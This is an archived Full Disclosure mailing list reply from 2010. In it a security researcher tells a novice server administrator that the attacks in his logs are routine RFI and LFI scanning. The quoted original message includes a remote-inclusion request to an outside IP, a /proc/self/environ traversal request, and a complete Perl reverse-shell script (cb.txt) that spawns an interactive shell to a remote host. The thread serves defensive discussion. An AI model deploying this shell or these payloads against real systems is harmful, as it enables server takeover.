Full Disclosure mailing list archives
Re: Using of the sites for attacks on other sites
From: "MustLive" <mustlive () websecurity com ua>
Date: Sun, 11 Jul 2010 21:39:15 +0300
Hello Dave! Soon I'll answer on comments of Chris and Sebastien on this topic, but first I'll answer to your letter. Just only one ask, next time when you'll be responding to the list at my letter, please, sent a copy of it to my e-mail. So I'll be knowing about it.
I have been witnessing such attacks in the past few weeks.
Man, it's another type of attacks. In my article, which I talked about in my letter to the list, I wrote about using of Abuse of Functionality vulnerabilities to attack other sites. So different sites become a tool in hand of attacker to conduct attacks (including DoS and DDoS) on other sites. I'll write soon additional information about such attacks concerning my last researches in this topic.
Most of the urls are trying to exploit components of web software that I do not have installed.
In your case we have different type of attacks then described in my article. And I saw such attacks for many years - I had many such attacks every day (up to few hundreds per day) at my site from July 2006 and till now. It's just people, mostly script kiddies, are looking for known vulnerabilities at the site. And they will not find any of them, if your site is secure. Particularly, they are looking for know RFI and LFI vulnerabilities in different web applications. In the first of your examples you can see that attacker was trying to including back.txt from remote server. So in all these attacks there are no other sites which were using to attack your site, it was just scripts which were hosted at different sites (particularly hacked sites), to include or download them to your server for execution. So if you have not such vulnerable webapps at your site, then you have no need to worry about it.
I think my server is pretty secure, but I am a novice so what do I really know? And as such I have blocked these IP's from accessing my server.
As I said, you have no need to worry about these attacks, if you have not such vulnerable webapps. And to ban or not to ban these IPs it's up to you. Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ----- Original Message ----- From: mrx Subject: Re: [Full-disclosure] Using of the sites for attacks on other sites
I have been witnessing such attacks in the past few weeks. Most of the urls are trying to exploit components of web software that I do not have installed. Some do GET existing pages such as index.php and tag the attack on the end. Such attacks began about 2 weeks ago. These attacks have so far come from three different IP addresses. and I was getting around a dozen such accesses every other day. I think my server is pretty secure, but I am a novice so what do I really know? And as such I have blocked these IP's from accessing my server. FYI The originating IP's all have wordpress blogs on them. If anyone is interested here is one such attack: <apache2 log entry> 88.181.49.182 - - [28/Jun/2010:19:54:35 +0100] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://212.154.190.140/back.txt?? HTTP/1.1" 404 220 "-" ... Here is another example: 94.199.181.165 - - [21/Jun/2010:05:36:27 +0100] "GET /index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 200 3775 "-" ... </apache2 log entries> <cb.txt content> #!/usr/bin/perl use Socket; $cmd= "lynx"; $system= 'echo "`uname -a`";echo "`id`";HISTFILE=/dev/null /bin/sh -i'; $0=$cmd; $target=$ARGV[0]; $port=$ARGV[1]; $iaddr=inet_aton($target) || die("Error: $!\n"); $paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n"); $proto=getprotobyname('tcp'); socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n"); connect(SOCKET, $paddr) || die("Error: $!\n"); open(STDIN, ">&SOCKET"); open(STDOUT, ">&SOCKET"); open(STDERR, ">&SOCKET"); system($system); close(STDIN); close(STDOUT); close(STDERR); </cb.txt content> If anyone would like more log entries let me know. If all this is beneath you guys.... sorry I bothered you. regards Dave
On 28/06/2010 21:13, MustLive wrote:
Hello participants of Full-Disclosure!
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Re: Using of the sites for attacks on other sites MustLive (Jul 11)
- Re: Using of the sites for attacks on other sites Paul Blackburn - Server Administrator (Jul 12)
- <Possible follow-ups>
- Re: Using of the sites for attacks on other sites MustLive (Jul 11)
- Re: Using of the sites for attacks on other sites Benji (Jul 11)